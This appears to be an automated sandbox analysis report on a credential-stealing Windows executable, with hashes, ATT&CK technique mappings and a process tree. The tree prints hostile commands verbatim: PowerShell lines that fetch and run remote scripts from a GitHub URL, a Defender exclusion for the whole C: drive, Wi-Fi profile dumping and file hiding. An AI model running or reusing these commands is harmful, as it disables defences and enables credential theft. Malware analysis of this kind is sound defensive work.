fc4f68222883438cae50486c76be9f770882b49785e1ef0c7ebd965c6b252e75

Analysis

max time kernel
137s
max time network
106s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
25/08/2024, 04:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe
Size

14.0MB
MD5

01055d7c7882cec1c91cb53363b8c81c
SHA1

48b85fd5da48807b0c9a64c1026b4aeaf5543bca
SHA256

fc4f68222883438cae50486c76be9f770882b49785e1ef0c7ebd965c6b252e75
SHA512

2be8432fbd30a127e8e974bed6848ca454f1d0bb7b399caae823ec1dfa94d01930a3143b00df21297a73c45d0d3f588fed835697d8e560a576b05ec2bd93469c
SSDEEP

196608:u1chh2Ys+B+nrWqdgOgHIxPGjGs92GNSkjGqIjHyn:uAhzn+nrWogOgeujGA2nkjMjH

Score

10^/10

credential_access discovery evasion execution persistence privilege_escalation ransomware spyware stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/antivirusbypass.ps1

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs

evasion

File and Directory Discovery

T1083

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened (read-only)	C:\Windows\System32\drivers\vboxmouse.sys	2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe

Blocklisted process makes network request 3 IoCs

flow	pid	Process
11	5048	powershell.exe
12	4280	powershell.exe
20	4516	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1108	powershell.exe
1016	PowerShell.exe
4280	powershell.exe
5048	powershell.exe
4516	powershell.exe

Looks for VMWare drivers on disk 2 TTPs 2 IoCs

evasion

File and Directory Discovery

T1083

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened (read-only)	C:\Windows\System32\drivers\vmmemctl.sys	2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe
File opened (read-only)	C:\Windows\System32\drivers\vmmouse.sys	2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1256	netsh.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
10	raw.githubusercontent.com
11	raw.githubusercontent.com
12	raw.githubusercontent.com
20	raw.githubusercontent.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
2572	ARP.EXE

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Thunder_Kitty.jpg"	2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3820	netsh.exe
3740	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
3400	NETSTAT.EXE

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4928	ipconfig.exe
3400	NETSTAT.EXE
3200	ipconfig.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2040	taskkill.exe

Modifies Control Panel 2 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\Desktop\TileWallpaper = "0"	2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\Desktop\WallpaperStyle = "2"	2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
5048	powershell.exe
1108	powershell.exe
1016	PowerShell.exe
4280	powershell.exe
5048	powershell.exe
1016	PowerShell.exe
1108	powershell.exe
4280	powershell.exe
4516	powershell.exe
4516	powershell.exe
4280	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5048	powershell.exe
Token: SeDebugPrivilege	1108	powershell.exe
Token: SeDebugPrivilege	1016	PowerShell.exe
Token: SeDebugPrivilege	4280	powershell.exe
Token: SeDebugPrivilege	2040	taskkill.exe
Token: 33	3128	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	3128	AUDIODG.EXE
Token: SeDebugPrivilege	4516	powershell.exe
Token: SeIncreaseQuotaPrivilege	4280	powershell.exe
Token: SeSecurityPrivilege	4280	powershell.exe
Token: SeTakeOwnershipPrivilege	4280	powershell.exe
Token: SeLoadDriverPrivilege	4280	powershell.exe
Token: SeSystemProfilePrivilege	4280	powershell.exe
Token: SeSystemtimePrivilege	4280	powershell.exe
Token: SeProfSingleProcessPrivilege	4280	powershell.exe
Token: SeIncBasePriorityPrivilege	4280	powershell.exe
Token: SeCreatePagefilePrivilege	4280	powershell.exe
Token: SeBackupPrivilege	4280	powershell.exe
Token: SeRestorePrivilege	4280	powershell.exe
Token: SeShutdownPrivilege	4280	powershell.exe
Token: SeDebugPrivilege	4280	powershell.exe
Token: SeSystemEnvironmentPrivilege	4280	powershell.exe
Token: SeRemoteShutdownPrivilege	4280	powershell.exe
Token: SeUndockPrivilege	4280	powershell.exe
Token: SeManageVolumePrivilege	4280	powershell.exe
Token: 33	4280	powershell.exe
Token: 34	4280	powershell.exe
Token: 35	4280	powershell.exe
Token: 36	4280	powershell.exe
Token: SeIncreaseQuotaPrivilege	4280	powershell.exe
Token: SeSecurityPrivilege	4280	powershell.exe
Token: SeTakeOwnershipPrivilege	4280	powershell.exe
Token: SeLoadDriverPrivilege	4280	powershell.exe
Token: SeSystemProfilePrivilege	4280	powershell.exe
Token: SeSystemtimePrivilege	4280	powershell.exe
Token: SeProfSingleProcessPrivilege	4280	powershell.exe
Token: SeIncBasePriorityPrivilege	4280	powershell.exe
Token: SeCreatePagefilePrivilege	4280	powershell.exe
Token: SeBackupPrivilege	4280	powershell.exe
Token: SeRestorePrivilege	4280	powershell.exe
Token: SeShutdownPrivilege	4280	powershell.exe
Token: SeDebugPrivilege	4280	powershell.exe
Token: SeSystemEnvironmentPrivilege	4280	powershell.exe
Token: SeRemoteShutdownPrivilege	4280	powershell.exe
Token: SeUndockPrivilege	4280	powershell.exe
Token: SeManageVolumePrivilege	4280	powershell.exe
Token: 33	4280	powershell.exe
Token: 34	4280	powershell.exe
Token: 35	4280	powershell.exe
Token: 36	4280	powershell.exe
Token: SeIncreaseQuotaPrivilege	4280	powershell.exe
Token: SeSecurityPrivilege	4280	powershell.exe
Token: SeTakeOwnershipPrivilege	4280	powershell.exe
Token: SeLoadDriverPrivilege	4280	powershell.exe
Token: SeSystemProfilePrivilege	4280	powershell.exe
Token: SeSystemtimePrivilege	4280	powershell.exe
Token: SeProfSingleProcessPrivilege	4280	powershell.exe
Token: SeIncBasePriorityPrivilege	4280	powershell.exe
Token: SeCreatePagefilePrivilege	4280	powershell.exe
Token: SeBackupPrivilege	4280	powershell.exe
Token: SeRestorePrivilege	4280	powershell.exe
Token: SeShutdownPrivilege	4280	powershell.exe
Token: SeDebugPrivilege	4280	powershell.exe
Token: SeSystemEnvironmentPrivilege	4280	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3152 wrote to memory of 4280	3152	2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe	85
PID 3152 wrote to memory of 4280	3152	2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe	85
PID 3152 wrote to memory of 5048	3152	2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe	86
PID 3152 wrote to memory of 5048	3152	2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe	86
PID 3152 wrote to memory of 2328	3152	2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe	87
PID 3152 wrote to memory of 2328	3152	2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe	87
PID 3152 wrote to memory of 1016	3152	2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe	89
PID 3152 wrote to memory of 1016	3152	2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe	89
PID 3152 wrote to memory of 1108	3152	2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe	90
PID 3152 wrote to memory of 1108	3152	2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe	90
PID 3152 wrote to memory of 3056	3152	2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe	91
PID 3152 wrote to memory of 3056	3152	2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe	91
PID 3056 wrote to memory of 920	3056	cmd.exe	92
PID 3056 wrote to memory of 920	3056	cmd.exe	92
PID 3152 wrote to memory of 3912	3152	2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe	93
PID 3152 wrote to memory of 3912	3152	2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe	93
PID 5048 wrote to memory of 2768	5048	powershell.exe	113
PID 5048 wrote to memory of 2768	5048	powershell.exe	113
PID 4280 wrote to memory of 3624	4280	powershell.exe	95
PID 4280 wrote to memory of 3624	4280	powershell.exe	95
PID 2768 wrote to memory of 4840	2768	csc.exe	96
PID 2768 wrote to memory of 4840	2768	csc.exe	96
PID 3624 wrote to memory of 5032	3624	csc.exe	97
PID 3624 wrote to memory of 5032	3624	csc.exe	97
PID 3152 wrote to memory of 2040	3152	2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe	99
PID 3152 wrote to memory of 2040	3152	2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe	99
PID 3152 wrote to memory of 4516	3152	2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe	102
PID 3152 wrote to memory of 4516	3152	2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe	102
PID 4516 wrote to memory of 3044	4516	powershell.exe	104
PID 4516 wrote to memory of 3044	4516	powershell.exe	104
PID 4280 wrote to memory of 3820	4280	powershell.exe	105
PID 4280 wrote to memory of 3820	4280	powershell.exe	105
PID 3044 wrote to memory of 5076	3044	csc.exe	106
PID 3044 wrote to memory of 5076	3044	csc.exe	106
PID 4280 wrote to memory of 2720	4280	powershell.exe	109
PID 4280 wrote to memory of 2720	4280	powershell.exe	109
PID 2720 wrote to memory of 3652	2720	net.exe	110
PID 2720 wrote to memory of 3652	2720	net.exe	110
PID 4280 wrote to memory of 1256	4280	powershell.exe	111
PID 4280 wrote to memory of 1256	4280	powershell.exe	111
PID 4280 wrote to memory of 4704	4280	powershell.exe	112
PID 4280 wrote to memory of 4704	4280	powershell.exe	112
PID 4280 wrote to memory of 2768	4280	powershell.exe	113
PID 4280 wrote to memory of 2768	4280	powershell.exe	113
PID 2768 wrote to memory of 3092	2768	net.exe	114
PID 2768 wrote to memory of 3092	2768	net.exe	114
PID 4280 wrote to memory of 4928	4280	powershell.exe	115
PID 4280 wrote to memory of 4928	4280	powershell.exe	115
PID 4280 wrote to memory of 1984	4280	powershell.exe	116
PID 4280 wrote to memory of 1984	4280	powershell.exe	116
PID 1984 wrote to memory of 1328	1984	net.exe	117
PID 1984 wrote to memory of 1328	1984	net.exe	117
PID 4280 wrote to memory of 680	4280	powershell.exe	120
PID 4280 wrote to memory of 680	4280	powershell.exe	120
PID 4280 wrote to memory of 3400	4280	powershell.exe	121
PID 4280 wrote to memory of 3400	4280	powershell.exe	121
PID 4280 wrote to memory of 4936	4280	powershell.exe	122
PID 4280 wrote to memory of 4936	4280	powershell.exe	122
PID 4280 wrote to memory of 3200	4280	powershell.exe	123
PID 4280 wrote to memory of 3200	4280	powershell.exe	123
PID 4280 wrote to memory of 456	4280	powershell.exe	124
PID 4280 wrote to memory of 456	4280	powershell.exe	124
PID 4280 wrote to memory of 2572	4280	powershell.exe	125
PID 4280 wrote to memory of 2572	4280	powershell.exe	125

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3912	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-08-25_01055d7c7882cec1c91cb53363b8c81c_poet-rat_snatch.exe"
1⤵
- Looks for VirtualBox drivers on disk
- Looks for VMWare drivers on disk
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:3152
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4280
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ypexlctq\ypexlctq.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3624
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES99B1.tmp" "c:\Users\Admin\AppData\Local\Temp\ypexlctq\CSC1DC421912A03406AB1AE781EF8CB15.TMP"
      4⤵
      PID:5032
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3820
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2720
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators
      4⤵
      PID:3652
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1256
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /all
    3⤵
    PID:4704
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2768
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:3092
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /displaydns
    3⤵
    - Gathers network information
    PID:4928
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1984
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup
      4⤵
      PID:1328
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
    3⤵
    PID:680
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -ano
    3⤵
    - System Network Connections Discovery
    - Gathers network information
    PID:3400
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
    3⤵
    PID:4936
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /all
    3⤵
    - Gathers network information
    PID:3200
- - C:\Windows\system32\ROUTE.EXE
    "C:\Windows\system32\ROUTE.EXE" print
    3⤵
    PID:456
- - C:\Windows\system32\ARP.EXE
    "C:\Windows\system32\ARP.EXE" -a
    3⤵
    - Network Service Discovery
    PID:2572
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3740
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/antivirusbypass.ps1')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5048
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ooxmqqjr\ooxmqqjr.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2768
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES99B0.tmp" "c:\Users\Admin\AppData\Local\Temp\ooxmqqjr\CSC7F88ACB699DB433C9475E627384D7A86.TMP"
      4⤵
      PID:4840
- C:\Windows\system32\cmd.exe
  cmd.exe /c start facebook.com
  2⤵
  PID:2328
- C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
  PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C "Add-MpPreference -ExclusionPath 'C:'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1108
- C:\Windows\system32\cmd.exe
  cmd /c rundll32.exe user32.dll,SwapMouseButton
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3056
- - C:\Windows\system32\rundll32.exe
    rundll32.exe user32.dll,SwapMouseButton
    3⤵
    PID:920
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
  2⤵
